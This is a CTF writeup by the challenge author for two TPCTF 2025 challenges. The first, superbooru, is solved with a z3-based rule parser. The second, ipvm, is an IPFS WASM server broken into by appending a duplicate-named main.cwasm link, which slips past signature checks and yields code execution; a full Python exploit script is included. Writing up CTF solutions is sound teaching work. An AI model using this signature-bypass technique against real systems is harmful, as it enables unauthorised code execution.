2025-03-10发表2025-03-12更新CTF / Writeup24 分钟读完 (大约3565个字)

[Writeup] TPCTF 2025 Official Writeup

点击输入文字…

该文章也提供：简体中文。

I created to challenges in TPCTF 2025: Misc - ipvm and Rev - superbooru. Personally speaking, I would rate them as of medium difficulty, with superbooru being a bit harder. The overall idea was to introduce some novel components in CTFs, enriching the experience and providing inspiration. Feel free to reach out if you have any thoughts or feedback.

Result: superbooru has one solve from 0ops, and ipvm has no solves.

`superbooru`

This challenge took inspiration from the booru image hosting service. Booru is a type of image hosting service that allows users to upload images and tag them. This challenge designed a simple booru with static tag rules, allowing to add/remove tags automatically based on rules. The rules are in the form of condition -> consequence, and their EBNF expression is as follows:

TAG = /\\w+/
ATOM = TAG | GROUP | NEG
GROUP = "(" CONDITION ")"
NEG = "-" ATOM

OR_TERM = ATOM ("/" ATOM)+
AND_TERM = OR_TERM ("," OR_TERM)+

CONDITION = ATOM | OR_TERM | AND_TERM
CONSEQUENCE = (NEG? TAG) ("," (NEG? TAG))*

Here are some examples of valid rules:

dog, male -> male_with_dog, -pet_only: If the tags contain dog and male, then automatically add the tag male_with_dog and remove the tag pet_only.
(dog / cat), -male -> pet_only, animal_only: If the tags contain dog or cat and do not contain male, then automatically add the tags pet_only and animal_only.

Well it looks good! Let’s check the handout:

BRUH

Note that here i is different from Ukrainian і.

If consequence does not contain -, the challenge would be simple. We can use z3 to define the tags as the disjunction of their implications and solve the constraint flag_correct. The annoying part is the -. How are we even supposed to add a tag and then remove it?

According to the code, the rules are applied round by round. In each round, rules that will be applied will be collected first, and be applied at the end of the round. By running flag check multiple times, we can notice an interesting insight: the number of rounds is almost fixed (around 2476 rounds). This hints that the rules might have a fixed set of logic. Additionally, the author kindly mentioned in the code:

1 2	# It's guaranteed that the same implication applied # multiple times will not change the result

This means that the same rule can be applied at most once, and even if it is applied multiple times, it will not change the result. In fact, if we record when these rules are applied, we will find that they are basically fixed. Then we can have a rough guess that these rules are divided into many “layers”, and within each layer, the rules either do not apply or apply in the same round (as the other rules in this layer).

But how EXACTLY are these rules divided into layers? As the hint released in the second half of the competition says, starting from the initial check_flag tag, there will be a chain of tags like check_flag -> -check_flag, new_flag1, new_flag1 -> -new_flag1, new_flag2, and so on. For the nth layer of rules, we add the condition of new_flag{n} to achieve this layered structure.

Given this information, we can write a script to simplify the rules and remove the unnecessary tags used for obfuscation.

sol.py >folded

from tqdm import tqdm

SPECIAL_CHARS = "(),/-"

name_map = {}


class Token:
    def __init__(self, value):
        self.value = value

    def __eq__(self, other):
        return isinstance(other, Token) and self.value == other.value

    def __repr__(self):
        return f"Token({self.value!r})"


class Lexer:
    def __init__(self, text: str):
        self.text = text
        self.pos = 0

    def __iter__(self):
        return self

    def char(self):
        if self.pos >= len(self.text):
            raise StopIteration
        return self.text[self.pos]

    def __next__(self):
        while self.char().isspace():
            self.pos += 1

        ch = self.char()
        if ch in SPECIAL_CHARS:
            self.pos += 1
            return Token(ch)

        start = self.pos
        while not (ch.isspace() or ch in SPECIAL_CHARS):
            self.pos += 1
            if self.pos >= len(self.text):
                break
            ch = self.char()

        return self.text[start : self.pos]


class Query:
    def __and__(self, other):
        return Group("and", [self, other])

    def __or__(self, other):
        return Group("or", [self, other])

    def __invert__(self):
        if isinstance(self, Neg):
            return self.query
        return Neg(self)

    def unwrap(self, type):
        return [self]

    def simplify(self):
        pass


class Tag(Query):
    def __init__(self, tag: str):
        self.tag = tag

    def __str__(self):
        if self.tag in name_map:
            return name_map[self.tag]
        return self.tag

    def __eq__(self, other):
        return isinstance(other, Tag) and self.tag == other.tag

    def __hash__(self):
        return hash(self.tag)

    def simplify(self):
        return self

    def tags(self):
        yield self.tag


class Neg(Query):
    def __init__(self, query: Query):
        self.query = query

    def __str__(self):
        return f"-{self.query}"

    def __eq__(self, other):
        return isinstance(other, Neg) and self.query == other.query

    def __hash__(self):
        return hash(self.query)

    def simplify(self):
        if isinstance(self.query, Neg):
            return self.query.query.simplify()
        return ~self.query.simplify()

    def tags(self):
        return self.query.tags()


class Group(Query):
    def __init__(self, type: str, queries: list[Query]):
        self.type = type
        self.queries = queries

    def __str__(self):
        assert self.queries
        sep = ", " if self.type == "and" else " / "
        return f"({sep.join(map(str, self.queries))})"

    def unwrap(self, type):
        if self.type == type:
            result = []
            for query in self.queries:
                result.extend(query.unwrap(type))
            return result
        return [self]

    def __eq__(self, other):
        return (
            isinstance(other, Group)
            and self.type == other.type
            and self.queries == other.queries
        )

    def __hash__(self):
        return hash((self.type, tuple(self.queries)))

    def simplify(self):
        negs = set()
        queries = []
        for query in self.queries:
            for item in query.simplify().unwrap(self.type):
                if isinstance(item, Group) and not item.queries:
                    assert item.type != self.type
                    return item
                if item in negs:
                    return Group("and" if self.type == "or" else "or", [])
                negs.add(~item)

                queries.append(item)

        if len(queries) == 1:
            return queries[0]

        return Group(self.type, queries)

    def tags(self):
        for query in self.queries:
            yield from query.tags()


def take_atom(lexer):
    token = next(lexer)
    if token == Token("("):
        return take_expr(lexer)
    elif token == Token("-"):
        return ~take_atom(lexer)
    elif isinstance(token, str):
        return Tag(token)
    else:
        raise ValueError(f"Unexpected {token}")


def take_expr(lexer):
    stack = [take_atom(lexer)]
    while True:
        try:
            token = next(lexer)
        except StopIteration:
            break

        if token == Token("/"):
            value = take_atom(lexer)
            stack[-1] = stack[-1] | value
        elif token == Token(","):
            stack.append(take_atom(lexer))
        elif token == Token(")"):
            break
        else:
            raise ValueError(f"Unexpected {token}")

    return Group("and", stack)


def parse_query(query: str):
    lexer = Lexer(query)
    return take_expr(lexer)


class Implication:
    def __init__(self, condition, consequence: list[str]):
        self.condition = condition
        self.consequence = consequence

    def __str__(self):
        cond = str(self.condition)
        if cond.startswith("("):
            cond = cond[1:-1]
        cons = ", ".join(map(str, self.consequence))
        return f"{cond} -> {cons}"


def parse_implication(implication: str) -> Implication:
    lhs, rhs = implication.split("->")
    return Implication(parse_query(lhs), parse_query(rhs).unwrap("and"))


with open("implications.txt") as f:
    imps = []
    for i, line in enumerate(f):
        line = line.strip()
        if not line:
            continue

        imps.append(parse_implication(line))

imps = imps[6:]

for imp in tqdm(imps):
    imp.condition = imp.condition.simplify()

who_implies = {}
who_implies_neg = {}
for i, imp in enumerate(imps):
    for tag in imp.consequence:
        if isinstance(tag, Tag):
            who_implies.setdefault(tag.tag, []).append(i)
        elif isinstance(tag, Neg):
            who_implies_neg.setdefault(tag.query.tag, []).append(i)

used = set()
queue = ["flag_correct"]
head = 0
while head < len(queue):
    cur = queue[head]
    head += 1
    for i in who_implies.get(cur, []):
        imp = imps[i]
        for tag in imp.condition.tags():
            if tag not in used:
                used.add(tag)
                queue.append(tag)

all_tags = set()
for imp in imps:
    all_tags.update(imp.condition.tags())
    all_tags.update(Group("and", imp.consequence).tags())

unused = all_tags - used - {"hooray", "flag_correct"}
for imp in imps:
    imp.consequence = [
        tag
        for tag in imp.consequence
        if not (isinstance(tag, Tag) and tag.tag in unused)
        and not (isinstance(tag, Neg) and tag.query.tag in unused)
    ]

with open("mapping.txt", "w") as f:
    for name in used:
        if not name.startswith("flag") and name != "check_flag":
            name_map[name] = f"t{len(name_map)}"
            print(f"{name_map[name]} = {name}", file=f)

with open("implications_new.txt", "w") as f:
    for imp in imps:
        print(imp, file=f)

Then we extract the tag chain starting from check_flag (denoted as PC chain). After that, we can attach the layer information to the consequences. For example, for the following rules:

check_flag -> -check_flag, new_flag1
new_flag1, a -> c
new_flag1, -a -> -c

new_flag1 -> -new_flag1, new_flag2
new_flag2, b -> a
new_flag2, -b -> -a

new_flag2 -> -new_flag2, new_flag3
new_flag3, c -> b
new_flag3, -c -> -b

They’re actually equivalent to executing c = a, a = b, b = c in order. After attaching the layer information, we have:

1
2
3

a1 = a0, b1 = b0, c1 = a0
a2 = b1, b2 = b1, c2 = c1
a3 = a2, b3 = c2, c3 = c2

So basically we can convert the problem into SMT then. To avoid the model from being way too complex, we only preserve the tags that have changed in each round (e.g., a1, b1, b2, c2, a3, c3 in the example above will be discarded). Finally, we can directly use z3 to solve it. On this basis, we can also use z3 to verify that the solution is unique.

sol2.py >folded

from tqdm import tqdm
from z3 import Solver, Bool, BoolVal, And, Or, sat, is_true, unsat

SPECIAL_CHARS = "(),/-"

cur_pc = None


def format_z3(pc, tag):
    return Bool(f"{pc}_{tag}")


class Token:
    def __init__(self, value):
        self.value = value

    def __eq__(self, other):
        return isinstance(other, Token) and self.value == other.value

    def __repr__(self):
        return f"Token({self.value!r})"


class Lexer:
    def __init__(self, text: str):
        self.text = text
        self.pos = 0

    def __iter__(self):
        return self

    def char(self):
        if self.pos >= len(self.text):
            raise StopIteration
        return self.text[self.pos]

    def __next__(self):
        while self.char().isspace():
            self.pos += 1

        ch = self.char()
        if ch in SPECIAL_CHARS:
            self.pos += 1
            return Token(ch)

        start = self.pos
        while not (ch.isspace() or ch in SPECIAL_CHARS):
            self.pos += 1
            if self.pos >= len(self.text):
                break
            ch = self.char()

        return self.text[start : self.pos]


class Query:
    def __and__(self, other):
        return Group("and", [self, other])

    def __or__(self, other):
        return Group("or", [self, other])

    def __invert__(self):
        if isinstance(self, Neg):
            return self.query
        return Neg(self)

    def unwrap(self, type):
        return [self]

    def simplify(self):
        pass


class Tag(Query):
    def __init__(self, tag: str):
        self.tag = tag

    def __str__(self):
        return self.tag

    def __eq__(self, other):
        return isinstance(other, Tag) and self.tag == other.tag

    def __hash__(self):
        return hash(self.tag)

    def simplify(self):
        return self

    def tags(self):
        yield self.tag

    def to_z3(self):
        assert cur_pc is not None
        if self.tag in pc_order:
            return BoolVal(True)
        if self.tag.startswith("flag_bin_") or self.tag == "check_flag":
            return Bool(self.tag)

        for i in reversed(tag_pcs.get(self.tag, [])):
            if i < cur_pc:
                return format_z3(i, self.tag)

        return BoolVal(False)


class Neg(Query):
    def __init__(self, query: Query):
        self.query = query

    def __str__(self):
        return f"-{self.query}"

    def __eq__(self, other):
        return isinstance(other, Neg) and self.query == other.query

    def __hash__(self):
        return hash(self.query)

    def simplify(self):
        if isinstance(self.query, Neg):
            return self.query.query.simplify()
        return ~self.query.simplify()

    def tags(self):
        return self.query.tags()

    def to_z3(self):
        return ~self.query.to_z3()


class Group(Query):
    def __init__(self, type: str, queries: list[Query]):
        self.type = type
        self.queries = queries

    def __str__(self):
        assert self.queries
        sep = ", " if self.type == "and" else " / "
        return f"({sep.join(map(str, self.queries))})"

    def unwrap(self, type):
        if self.type == type:
            result = []
            for query in self.queries:
                result.extend(query.unwrap(type))
            return result
        return [self]

    def __eq__(self, other):
        return (
            isinstance(other, Group)
            and self.type == other.type
            and self.queries == other.queries
        )

    def __hash__(self):
        return hash((self.type, tuple(self.queries)))

    def simplify(self):
        negs = set()
        queries = []
        for query in self.queries:
            for item in query.simplify().unwrap(self.type):
                if isinstance(item, Group) and not item.queries:
                    assert item.type != self.type
                    return item
                if item in negs:
                    return Group("and" if self.type == "or" else "or", [])
                negs.add(~item)

                queries.append(item)

        if len(queries) == 1:
            return queries[0]

        return Group(self.type, queries)

    def tags(self):
        for query in self.queries:
            yield from query.tags()

    def to_z3(self):
        queries = [query.to_z3() for query in self.queries]
        return And(queries) if self.type == "and" else Or(queries)


def take_atom(lexer):
    token = next(lexer)
    if token == Token("("):
        return take_expr(lexer)
    elif token == Token("-"):
        return ~take_atom(lexer)
    elif isinstance(token, str):
        return Tag(token)
    else:
        raise ValueError(f"Unexpected {token}")


def take_expr(lexer):
    stack = [take_atom(lexer)]
    while True:
        try:
            token = next(lexer)
        except StopIteration:
            break

        if token == Token("/"):
            value = take_atom(lexer)
            stack[-1] = stack[-1] | value
        elif token == Token(","):
            stack.append(take_atom(lexer))
        elif token == Token(")"):
            break
        else:
            raise ValueError(f"Unexpected {token}")

    return Group("and", stack)


def parse_query(query: str):
    lexer = Lexer(query)
    return take_expr(lexer)


class Implication:
    def __init__(self, condition, consequence: list[str]):
        self.condition = condition
        self.consequence = consequence

    def __str__(self):
        cond = str(self.condition)
        if cond.startswith("("):
            cond = cond[1:-1]
        cons = ", ".join(map(str, self.consequence))
        return f"{cond} -> {cons}"


def parse_implication(implication: str) -> Implication:
    lhs, rhs = implication.split("->")
    return Implication(parse_query(lhs), parse_query(rhs).unwrap("and"))


with open("implications_new.txt") as f:
    imps = []
    for i, line in enumerate(f):
        line = line.strip()
        if not line:
            continue

        imps.append(parse_implication(line))

for imp in tqdm(imps):
    imp.condition = imp.condition.simplify()

who_implies = {}
who_implies_neg = {}
for i, imp in enumerate(imps):
    for tag in imp.consequence:
        if isinstance(tag, Tag):
            who_implies.setdefault(tag.tag, []).append(i)
        elif isinstance(tag, Neg):
            who_implies_neg.setdefault(tag.query.tag, []).append(i)

pcs = ["check_flag"]
while True:
    pc = pcs[-1]
    if pc not in who_implies_neg:
        break
    assert len(who_implies_neg[pc]) == 1
    imp = imps[who_implies_neg[pc][0]]
    assert len(imp.consequence) == 2
    other = (
        imp.consequence[0]
        if isinstance(imp.consequence[1], Neg)
        else imp.consequence[0]
    )
    assert isinstance(other, Tag)
    pcs.append(other.tag)

print(len(pcs))

pc_order = {pc: i for i, pc in enumerate(pcs)}

important_imps = []
tag_pcs = {}
for imp in tqdm(imps):
    if isinstance(imp.condition, Tag) and imp.condition.tag in pcs:
        continue
    assert len(imp.consequence) == 1
    tag = imp.consequence[0]
    if isinstance(tag, Neg):
        continue

    tag = tag.tag
    if tag == "hooray":
        continue

    pc = None
    for t in imp.condition.tags():
        if t in pc_order:
            assert pc is None
            pc = t

    assert pc
    pc = pc_order[pc]
    imp.pc = pc
    important_imps.append(imp)
    tag_pcs.setdefault(tag, []).append(pc)

for pcs in tag_pcs.values():
    pcs.sort()

defs = {}

solver = Solver()
for imp in tqdm(important_imps):
    tag = imp.consequence[0].tag
    pc = imp.pc

    cur_pc = pc

    key = (pc, tag)
    val = defs.setdefault(key, BoolVal(False))
    defs[key] = val | imp.condition.to_z3()

for (pc, tag), val in defs.items():
    solver.add(format_z3(pc, tag) == val)

pcs = tag_pcs["flag_correct"]
assert len(pcs) == 1
solver.add(format_z3(pcs[0], "flag_correct"))

assert solver.check() == sat
model = solver.model()

ors = []

bits = []
flags = set()
for i in range(256):
    fl = f"flag_bin_{i:02x}"
    bits.append("01"[int(is_true(model[Bool(fl)]))])
    ors.append(Bool(fl) != is_true(model[Bool(fl)]))
    if is_true(model[Bool(fl)]):
        flags.add(fl)

solver.add(Or(*ors))
assert solver.check() == unsat

print(flags)

chs = []
for i in range(32):
    bs = bits[i * 8 : (i + 1) * 8]
    chs.append(chr(int("".join(reversed(bs)), 2)))

print("".join(chs))

The code seems verbose, but most of it is just repeated expression parsing. It takes about a minute to run the entire exp, which is still acceptable.

`ipvm`

This challenge is based on IPFS, a decentralized file storage protocol. IPFS essentially splits a piece of data into many blocks, each uniquely identified by its hash value. The entire data is also identified by a hash value (the hash of all its sub-blocks concatenated and hashed again, see Merkle Tree), called CID. These blocks are then distributed across a P2P network. Ideally, you only need the CID of a data or file to recursively download all its sub-blocks from the network. Sounds cool! But in reality, P2P is far from being ideal; moreover, IPFS has various design flaws, see How IPFS is broken. There’re still a batch of people using IPFS, so yeah, it’s up to you to decide.

Back to this challenge. This challenge provides a WASM runtime platform based on IPFS. You can:

build: Upload a folder containing wat / wasm files (yes, IPFS supports folders), and the server will optimize and compile it, sign it, and return the compiled package CID.
run: Upload a package CID, and the server will verify the signature and run it.

That’s it, really simple. Where can the vulnerability even be?

We know that the running process of wasm generally involves AOT compilation followed by local execution. Here build and run basically reproduce this process, which could lead to RCE because the output of build is essentially native code. If we can control the input to run, we can do whatever we want. However, the signature verification is quite annoying. If the output is not generated by a normal build, it won’t pass the signature verification. Wasmtime, the runtime environment, is known for its security, making it difficult to exploit a 0day RCE from wasm. What should we do then?

If you are carefully enough, you can spot an inconsistency in the way the server reads files from the folder. The first method is ipfs_read, which directly calls ipfs cat <path> to print the file content. Here, path can be either the CID itself (of course, this requires that the CID corresponds to a file rather than a folder) or a sub-file path of the CID (e.g., CID/config.json). The second method is to create a temporary folder and use ipfs get <CID> to download all files from the CID into this temporary folder.

This inconsistency turns out to be the key to the vulnerability. After some digging, we know that IPFS uses DAG-PB to store directories. The protobuf definition is as follows:

message PBLink {
  // binary CID (with no multibase prefix) of the target object
  optional bytes Hash = 1;

  // UTF-8 string name
  optional string Name = 2;

  // cumulative size of target object
  optional uint64 Tsize = 3;
}

message PBNode {
  // refs to other objects
  repeated PBLink Links = 2;

  // opaque user data
  optional bytes Data = 1;
}

An idea emerges: what if we have multiple PBLink with the same name in a PBNode (corresponding to multiple files with the same name in a folder)? It turns out that ipfs cat will return the content of the first file, while ipfs get will write all files sequentially, resulting in the last file’s content being the final output. This inconsistency allows us to maliciously append a main.cwasm to the package generated by build. During signature verification, ipfs cat will work fine, but when we download and execute it using ipfs get, it will execute our malicious main.cwasm. This is how we achieve RCE.

As for constructing malicious payload main.cwasm, I patched a compiled main.cwasm using IDA, injecting a segment of shellcode into the function execution part.

P.S. Use protoc dag.proto --python_out . to compile protobuf

exp.cwasm

dag.proto >folded

syntax = "proto3";

message PBLink {
  // binary CID (with no multibase prefix) of the target object
  optional bytes Hash = 1;

  // UTF-8 string name
  optional string Name = 2;

  // cumulative size of target object
  optional uint64 Tsize = 3;
}

message PBNode {
  // refs to other objects
  repeated PBLink Links = 2;

  // opaque user data
  optional bytes Data = 1;
}

build/config.json >folded

{
  "name": "test",
  "entrypoint": "add"
}

build/main.wat >folded

(module
    (func $add (export "add") (param $a i32) (param $b i32) (result i32)
        (i32.add (local.get $a) (local.get $b))
    )
)

exp.py

from dag_pb2 import *
from base58 import b58decode
import subprocess as sp
import requests as rq


ip, port = '127.0.0.1 8000'.split()
base = f"http://{ip}:{port}"
ipfs = ["ipfs", "--api", f"/ip4/{ip}/tcp/{port}"]


def add(path):
    output = sp.check_output(ipfs + ["add", "-r", path]).decode().strip()
    line = output.splitlines()[-1]
    return line.split()[1]


built = rq.post(f"{base}/build", json={"cid": add("build")}).json()
output = sp.check_output(ipfs + ["block", "get", built["cid"]])

node = PBNode()
node.ParseFromString(output)

exp = add("exp.cwasm")
node.Links.insert(2, PBLink(Hash=b58decode(exp), Name="main.cwasm", Tsize=13483))

p = sp.Popen(ipfs + ["block", "put", "--format=v0"], stdin=sp.PIPE, stdout=sp.PIPE)
p.stdin.write(node.SerializeToString())
p.stdin.close()
modified = p.stdout.read().decode().strip()

output = rq.post(f"{base}/run", json={"cid": modified, "args": "1"}).json()
print(output)

[Writeup] TPCTF 2025 Official Writeup

https://mivik.moe/2025/solution/tpctf-2025-en/

作者

Mivik

发布于

2025-03-10

更新于

2025-03-12

许可协议

[Writeup] TPCTF 2025 Official Writeup

`superbooru`

`ipvm`

作者

发布于

更新于

许可协议

喜欢这篇文章？打赏一下作者吧

评论

目录

链接

最新文章

订阅更新